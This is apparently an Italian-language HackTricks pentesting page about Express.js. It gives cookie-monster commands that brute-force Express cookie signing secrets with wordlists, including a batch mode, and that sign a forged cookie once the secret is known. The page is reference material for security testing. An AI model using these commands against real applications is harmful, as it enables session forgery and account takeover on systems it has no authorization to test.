HackTricksNodeJS Express
Reading time: 2 minutes
tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
Firma del Cookie
Lo strumento https://github.com/DigitalInterruption/cookie-monster è un'utilità per automatizzare il testing e la ri-firma dei segreti dei cookie di Express.js.
Cookie singolo con un nome specifico
bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
Elenco di parole personalizzato
bash
cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
Testare più cookie utilizzando la modalità batch
bash
cookie-monster -b -f cookies.json
Testare più cookie utilizzando la modalità batch con una wordlist personalizzata
bash
cookie-monster -b -f cookies.json -w custom.lst
Codifica e firma un nuovo cookie
Se conosci il segreto, puoi firmare il cookie.
bash
cookie-monster -e -f new_cookie.json -k secret
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.